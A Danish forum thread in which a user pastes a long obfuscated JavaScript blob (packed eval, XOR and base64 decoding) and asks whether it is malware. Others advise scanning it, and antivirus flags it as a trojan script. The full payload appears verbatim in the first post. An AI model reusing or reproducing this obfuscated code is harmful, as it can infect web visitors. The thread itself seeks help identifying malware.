Avatar billede htx98i17 Professor
04. august 2012 - 14:06 Der er 7 kommentarer og
1 løsning

Er dette malware?

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('D P(f){w.1p=D(a,b){v c=\'\';1l(v i=0;i<b.N;i++){c+=M.L(a.S(i%a.N)^b.S(i))}H c};w.Z=D(h){G(h.B(\':\'))h=h.R(\':\')[0];v a=h.R(\'.\');X(a.N>2){a.1j()}H a.1a(\'.\')};w.E=D(){H w["1g"["s@u#$m$%t!@@!r$@#%@$!#$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((1-0),(1-0))+"1M"["s$#@#u%m!@%#@!%#$#$!$!t$!%r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-4+11),(1-0))+"1d"["s$K$@$#t$%r##".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-1+5),(2-1))+"1s"["s$u####%@%m@t!r!".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-1+4),(2-1))+"1O"["s%!%@q#!s@!p$#%#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((11-2),(1-0))+"1e"["s$!%u@#%m%t$#@r#!@#$#!".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(2-1))+"1f"["s%@$@%!u@!%!!#%b#$F$%%%$#@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-0),(2-1))+"1h"["s@u%!$m%#!##@@!#!@#%t%%r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-2),(1-0))+"1i"["s#!#!!u!%$%b$%@#%n@@$r@!%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-2),(2-1))+"1k"["s$u#%!%@%@@!$###%$#b%#s#%$%!$%!$@$t@$@r%!%#%%@$%#$@#%%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-3+9),(2-1))](w.Z(1w["1J"["s$$!K$t!r%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+8),(1-0))+"1X"["s$##!u$!%%##b%$!@s!@!t!$##!@$#r$#!#!".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((8-2),(2-1))+"2z"["s#$u$!#%b!n%!%$#r@!%$%!".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((5-0),(2-1))+"2A"["s!$%$@u@##$#%#%@@@#@##$b%s#@$#$#@$%#%#t#$%%@%%%r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(1-0))+"2B"["s$@#!@%@@!%!%%%!@#%u$%@m$%@@$%!@$%###t@%#@@r#%#!@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((8-4),(1-0))+"2C"["s$%u@!b!#@%%%s#t@r@@!!@#!$!%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-1+11),(2-1))+"2I"["s@@%$!!#!#%@$#$@u!%#b#@s!#p".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-1),(1-0))+"16"["s@u#@!$@#$!!%@b$!@@$%$!s%$#!$@!$@!%!$p!##@#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(2-1))]["18"["s!#%%@u!b$s$##!$##%%$t@!@r@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-0),(1-0))+"19"["o!@#m##!@#p!$#$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-2),(1-0))+"1b"["o$b!$%s%$#$%t!!!@r#!$%@%#$%@!#$%##$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+5),(1-0))+"1c"["s!@#u$@$@!%#$$%!!##%%##m%$##t%%$@%@#%$@$r!!%##!%%%#$!$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(2-1))]),w.T(w.U))};w.T=D(a){v b="";v c,I,J="";v d,C,x,z="";v i=0;v e="1m"["s!!u%#$!###@##!#b##@s%%#p!$#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((2-0),(2-1))+"1n"["s@##!@@@$u$@$b%$s!!!%$!t!#%#!$%#%#$$%@$##%r$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+5),(2-1))+"1o"["o%m@p!@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((7-2),(1-0))+"1q"["o#%!%b@n@!%r##@@@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((11-5),(1-0))+"1r"["s#@!%!@!@@#%$%#u#$@$#@#!!##b!$@$%@%s!$!@$%t%!$r!@$#$@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+6),(1-0))+"1t"["s@$u%@@b##n!!$r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+6),(1-0))+"1u"["s$#!!@%$#!%%!u%%$##!b%%!n@@r#%@@%$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((9-4),(1-0))+"1v"["V#s##!@%%t!r#$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+5),(2-1))+"1x"["s%q#n%$r$!!!@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((7-1),(1-0))+"1y"["s#u%%!$%!$#@!b!%$s#$#@!@t%@#$!@!@$r@#%$!%%#%@#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(1-0))+"1z"["s$#@@%%%@u%#$@@b###%#%%$@#s#!!@%!!!%!$t@$!$%r@$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-2),(2-1))+"1A"["s@$@!$#@!u%b#s%t#%#!$r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((1-0),(2-1))+"1B"["s%q@@#%@s@!!%%t%@$@!r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((1-0),(2-1))+"1C"["o#%@%!$%@!#%%#!@%@@#!$%%$@@%!#!b#s#@$!$!%t%#!!@r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((2-1),(1-0))+"1D"["s@@#u@$#b###!@$n@r%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(2-1))+"1E"["o@@m!$@t!%!!r!%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((2-1),(1-0))+"1F"["s$##$%$@%$!%$q$s##%!p!@@$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((3-0),(1-0))+"1G"["s#u#@$!b#!!#@@@!!%!@$s!!!%@@t$@$#@!r%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(2-1))+"1H"["s%##u@b!@@%%@$!%s$!$t$#@%r#%!".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((8-3),(2-1))+"1I"["s$u!@y!#%r@$%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((3-1),(2-1))+"1K"["s$#u@b@%%$!$##s%t#%%r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-2),(2-1))+"1L"["o$b@%@s!#!$%@@#p$%$!@!!#$##@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-1+3),(1-0))+"2Q"["V@#!@%!@$@!##$@#$%s%#!%@t$r$#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-3+7),(1-0))+"1N"["s!##!!$%$u#%@@b%!$%$@$%$%#%s##!t!%@$!%$r#$#@#%!$!#!##$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((17-8),(1-0))+"1P"["s!@#$@@###$%!%!!u!%$#@b$s#@#%%$#t%%%@$%!%@$#%%r#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((7-1),(2-1))+"1Q"["o!@@m%%%@t%$r#%@#!#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((2-1),(2-1))+"1R"["s@@u!$#y@%%@$r@%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-5+12),(1-0))+"1S"["s@%@q%s!%@$#t$r#!%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((1-0),(2-1))+"1T"["s$u%!#@!#b%%!$@#%$@!@n@!!$%#$@!%r!$@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+5),(2-1))+"1U"["s#@$!q!$%#!$#s#%#t@%##r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((2-1),(1-0))+"1V"["s!%!#@@@%%@u##@#y%#$r!$!%$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+5),(1-0))+"1W"["s!%%##@K$p%$!#$@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((15-5),(1-0))+"1Y"["s##%$#u%y%#@@r!@##%$#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(1-0))+"1Z"["s!#$u##!%@!#b#s#!$!%p".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((17-7),(2-1))+"20"["s%$#u$b!@!#%@s!@@!@$t!%$%%$$r#%%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(2-1))+"21"["s$%u@b#!$#!n!#r%#%@$%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+6),(2-1))+"22"["s$#@@$!@u#@##!@!@%!#$@#!@!#@%##$@$#!@$#b!!!!%@%$$@%%$!@!$%#$%s%#t#%@#r$@$%!$!##".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-1+11),(1-0))+"23"["s$#@!$%%@@%@u#$!!!$%b%#!#%#!%@@@s$%$%$!#$!$@#t!$@@r#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((8-2),(1-0))+"24"["s!@#!$!%@$#$!q%#%%#%#$@%%F@%$!".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-2),(2-1))+"25"["s@@!$u###!#%!m!@$t!$%r$!%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((3-0),(2-1))+"26"["s!%$%!u%!@$%b@#!%s!$t##!%r@@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-2),(1-0))+"27"["s#%!u@%@%$!@###@#b$###@s@#%@#%$%t!r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((6-3),(1-0))+"28"["o#@m%#p$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-0),(1-0))+"29"["s%%q###%n@#r$!!@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((2-1),(1-0))+"2a"["s$@$%!$@!#@u#b##n!$##!@!!@$@!@%@#@r%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((8-4),(1-0))+"2b"["s!u!b#F".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((2-0),(1-0))+"2c"["o@$%$%b@!$s$%@%#$#!@$#@!t%!#r@#@#%#%@#$@%@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(2-1))+"2d"["o!@@m#@!t!###r#@@!$#!".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-3+8),(2-1))+"2e"["o$%@@$!$m@!%$@!!%t#@r@#%$#%!$##%$%#$".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((2-0),(2-1))+"2f"["s!%%@$!%u@$@!@b%s@!%$t#r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((6-3),(2-1))+"2g"["o#b!!n##r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((3-0),(1-0))+"2h"["s#%!@q#!s%@!!%t!@$%@$%$!%#r%!%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((17-7),(2-1))+"2i"["s!q!$@%%#@@s!#t%r#$@%#!##".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((1-0),(1-0))+"2j"["s#$u#@#@#y@!!!#$!$r@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(1-0))+"2k"["s##!!#u%%$#%!b$s!#%!%$t@@#@$r@$$%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+8),(1-0))+"2l"["s!%@$u%@!#!$#@$!!%#$b$#!!##n%r@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((6-3),(2-1))+"2m"["s!##%$#!u@b%%@$#!$!s#t!$r@$@@!".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-1+4),(2-1))+"2n"["s#u%$#!$@%@#%##$%@@b#@%$#s#@@t%@%r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+5),(1-0))+"2o"["s#u#$##$b#@!%$#!s%@%!@%t@$%$r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-1+4),(1-0))+"2p"["s@K%!t#r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((1-0),(1-0))+"2q"["s#!#q#!F!!%#%".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((10-4),(1-0))+"2r"["s!%u@b$@%#@###$%!@#%#$@!%!!n%!@$r#".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((0-0),(2-1))+"2s+2t"["s#$u$%b%!$s$t%!!r!".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((-2+8),(1-0))+"2u/2v"["s!$u%$@!#@m$%%!!!%t%#r@!#%%!@@!@@!!#@".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((4-2),(1-0))+"2w=2x"["s!%%$#@%!u$b%#s%!#$t!$#$!r".l(/[^A-k-j-9\\+\\/\\=]/g,"")]((3-1),(2-1));a=a.l(/[^A-k-j-9\\+\\/\\=]/g,"");2y{d=e.B(a.O(i++));C=e.B(a.O(i++));x=e.B(a.O(i++));z=e.B(a.O(i++));c=(d<<2)|(C>>4);I=((C&15)<<4)|(x>>2);J=((x&3)<<6)|z;b=b+M.L(c);G(x!=Y){b=b+M.L(I)}G(z!=Y){b=b+M.L(J)}c=I=J="";d=C=x=z=""}X(i<a.N);H b};w.U=f}v Q=13 P("2D+2E+2F+2G+2H");v 14=13 P("2J/2K/2L==");G(2M 2N!="2O"){Q.E()}2P{W(14.E());W(Q.E())};',62,177,'|||||||||||||||||||z0|Za|replace|bs|st|su|tr|ub|||||var|this|enc3|bst|enc4||indexOf|enc2|function|BNLRCDJBXPosU|str|if|return|chr2|chr3|ubs|fromCharCode|String|length|charAt|WLaiflle|kVcMNdAHaFM|split|charCodeAt|sknNPdiBKL|asqhSDvnS|sub|eval|while|64|getTopHost||||new|vTbTdbJWZaIEbC||nCSfrd||MKKWhbe|FwoHCcxbylMoQt|join|ffhsNQDgTmUxR|toVEgkCCmAF|XEokty|UZRIQABy|lhPLhZH|wmdyHeqeh|exlopr|sgsGI|shift|aSLHipuwG|for|xNAkTKPEgB|NBgByFsIpIg|hEWUQCoSvNx|mVtHpUhlsu|CAPwTQDplfa|xtvJEw|DHxHW|lgCyFxZd|pAXIqGNFllEBfb|TMJHIyT|window|iqhLGaIh|JWnCC|nfKWgO|ULCBGI|HMHKffpwRXWXuG|xNwLBUwiVpBXX|OXMuN|fPTTFpXd|XnXQw|RyKgON|quiUuSNWMT|IMTxfzPTqPrnM|phmwmOlFcBN|DoUHnuHAOSrP|vSVXZFzB|mCXBRQFVvh|BBJbAvemMXxy|gCvGEFnFSpAgq|MIVervYyvy|sZkEzFz|roBELJhan|hbivp|yDAcLUBk|ZdAGykIVNS|MdKeRuUZ|GHMytxQlbAfrH|HFJZWwoR|gTaKS|WPRHmhKzCFhJOT|ioGasBP|AzLgjpREgham|mutbZlTmSbkR|WgOmcrlJ|hvmHAHUq|PwAnR|gRoottqxyCa|sTEpJfTRf|GxHvqItNkWL|mrnuniZ|HsGEsWIRezVM|lUtTAd|udGtdZZ|ynKFEvKnQoTUCg|XuwZAtUydVSXc|RqGxZnk|EiZymVRUKIKzDp|VwIyALZwlHzsw|P0UAFcR|1bIvAg|Apqrhh2ZOJf|CAo3z|yDI4PUTNtVveQ|uVG5V|AHi6Eh|b7zSnBoxyanFbB|FGIGOw8xl|9lEgSpn|AkUqFX|mC|ih|otshqHrA|my|sDQJt|do|JAKlpctZ|aOpIw|qaqMtF|tcOxyWaBlqiS|AhMTSQ8QABQKHAEyTAUFGhcTSVFFQ11lBBQfDhAEABMNNg4EHAgKAAZNE0RbT3gXCB5FBQcGBlVQDlRQfngHHAIGBg8AHFUPTwoFEQA|AAIMBk5GeA5nJG1EWwEVBhxFEAcBHBAfDgcDFRwGDEwMFEYCHQAeS0QEAhcTSQMLF0YNExsDSxZhfRcNDAEAHBIcUkhNSgsIAR8EBxhLFQMbNxkIQwEFADAYIAhNVQQOHBsIXBdMXVwGDBggHgMCFxsZXSYSIBMGJw0IF05IFhwbCU1QfntrYBgKBgcDLRcMQAoOBgFBVEwAHgMCFxsZXUoHERwGHQReeG8JHQdNBhIKBlIISVFFQl1PG1VRDgEHER8EBxgWXAoKHBIZRl9LHVlKQExvex1PeHxkSwgOGRcPHR8|GztBHRsAQREYER0XDB5FT0YJBxsOWg0EGlJJQExve28UeHxkJwcHERMTPQUIFwkaBl0aTw0fXUlrYGUYeEZmexABSwkOGgYSMgU4XAkBHxoYXQEEAQZBVEwDBwgMBhwCQERDXVJrYGUeeG9mexYBSwUZIBsMDAMQBk4YExwZB19hfXtoHg0MBkZSUgYIWjACGRcOHBhNVQgKCgEvTwoFEQBJQEtJEAcBHBAfWg0GEVtaY2VsD29lewhnJ0tEBxcVSQIEBA8IEwEEQQphfRcNDAEAHBIcUkhNSgsIAR8EBxhLFQMbNxkIQwEFADAYIAhNVQQOHBsIXBdMXVwGDBggHgMCFxsZXSYSIBMGJw0IF05IBxlKBz9bKVwGDBggHgMCFxsZXSYSIBMGJw0IF05IHhxKB19hfQYOHQ0JLQQOHBsIXBdLSVIEBQkIFwgbAVsBSwoMABpaY2UDHRRPWgMMXEQCVE9BWVdFG0ZTUhABSwkOGgYSRwAAHAEbGk5NR09AXVJrYBdFeG9mFxkIQwEFAAE6ADFLBg8bHhBNE0QCVFlBWFdve28KHhAASwofBykINEIKHAsABwYIQRIOBlJcSQoQHAUbGxoDDkxCVHhoYBdve29mEBQDQAEZXAYJAB9LBg8bHhBEFW5ifXsCBQkEADIGHxACWxBDAxMIHUVeeG9mD39kJwEHER8EBxgWKQ8yXBoDQwseBxcOHBhFT0YJBxsOWg0EGlJJQExve28UeHxkJwcHERMTPQUIFwkaBl0aTw0fXUlrYGVsBQcGBlVQDhcOACYIBAkKBxJHVRsIVhApFRwPDB5NW0FDEBQDQAEZABsMDEVeeG9mD3xnJxlhfQUAABhFT0YcFwE5RwkOGwcVQUsLFx4bMBQDQAEZXFtGRQ4EHAgKAAEEQwFCT3gcSWZveAAaHBYZRwsFVBAABwIAAE4BAFxnVW5iFx4ECB4xGwsKHQAZBhMKHQZIUmZsFwoKHxADWhdLSVIFBg8QHwMBBlsKSxAuGBcMDAIRMB8mFl1KTAUFGhcTGktMXAEKBjABSwkOGgYSKxUxEwEhExgIBkMPHQRGQFdve0lAGhwJS0QKGB5BDQUTAWxmFBofDkwdFQBBAExYUlZUUhxNEkQOGBcMDAIRAUgDFxsKWgxQVBtKQkVFeG8UUn9kJw0NVFoPG0xYT0ZHG1VGDlVCXXhoYBdve29mXVoeRgscVAEEBQkGBgMLUhcMQAoOBntrYGVsFwoKHxADWhcwHS9PGhgcHgNBFhweXggKDVJcSU4HHgkMGVdWJG1iCVIEBR8AeG9mCXxCAQwCEBdBDBoAAB8bGhwDSUQOGAEEY2VsewMDFxgIQBAYLxs8Rx8RCwoKXBEEXRQHFQtBVExHHAkBF1dWJ25ifQ9rYBFvexEOGwFNE0QYEQY1AAEAHRMbWlIDSxwfNhMPBwkXWk9IXhcMQAoOBgYIBAlMSWwSeH8LWwoIABsOB0wLFx4bMBQDQAEZXFtBYxdvew8JWhYYXBYOGgY|Cw0LHAMdUklNWgsfFR4|Cw0LHAMdAVxNJG0QfntoChkXAAMBBioPTwoFEQBBQkdeUmxmD39kSwgYEXhoEmUGBxQdFxsZcQYKGhwEG0xYUldUeHwQJG0JFRwPDB5NERMdABADWjsJFRwPDB5MSWwS|Eklovu|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|typeof|_typeof_|undefined|else|iQPfWcfJylna'.split('|'),0,{}))
Avatar billede 220661 Ekspert
04. august 2012 - 17:59 #1
Det kan jeg ikke vurdere. Det ser ud som om volapyk.
Kar du prøvet at scanne den?
Hent Malwarebytes Anti-Malware herfra:
http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?part=dl-10804572&subj=dl&tag=button

Installer programmet - når det er gjort skal du lade programmet opdatere sig. Herefter åbner et vindue, hvor du skal flytte prikken til "Kør et fuldstændigt systemscan" - klik på Skan Knappen - lad programmet arbejde. Når det er færdig (det tager lidt tid afhængig af hvor meget du har på computeren).
Derefter - Tryk på "Vis resultater" knappen efter scanningen - og herefter tryk på "Fjern det valgte" - nu åbnes log'en og du skal gemme den et sted, hvor du kan finde den igen. Kopier loggen herind.
Mht.: Vista/Win7 - HøjreMusseTast - "Kør som Administrator..."
Avatar billede 220661 Ekspert
04. august 2012 - 18:00 #2
Er det samme problem i anden browser?
Avatar billede chazeftw Nybegynder
04. august 2012 - 18:32 #3
Skan filen her, så får du dit svar:

www.virustotal.com
Avatar billede htx98i17 Professor
04. august 2012 - 20:08 #4
Kaspersky
HEUR:Trojan.Script.Generic

Her var prøven positiv.
Så det var vel malware.
Avatar billede r3cor Nybegynder
04. august 2012 - 20:10 #5
Hvis du skriver koden et tilfældigt sted samtidigt med at du har en AV kørende, vil den klassificere koden som javascript exploit.
Avatar billede htx98i17 Professor
04. august 2012 - 20:15 #6
#5 det forstod jeg ikke :-)
Avatar billede r3cor Nybegynder
04. august 2012 - 20:21 #7
#6 Bare det at jeg kopierede noget af koden i dit dokument fik min antivirus til at opfange det som malware, det var det jeg mente :)
Avatar billede htx98i17 Professor
04. august 2012 - 20:29 #8
Aaaahh :)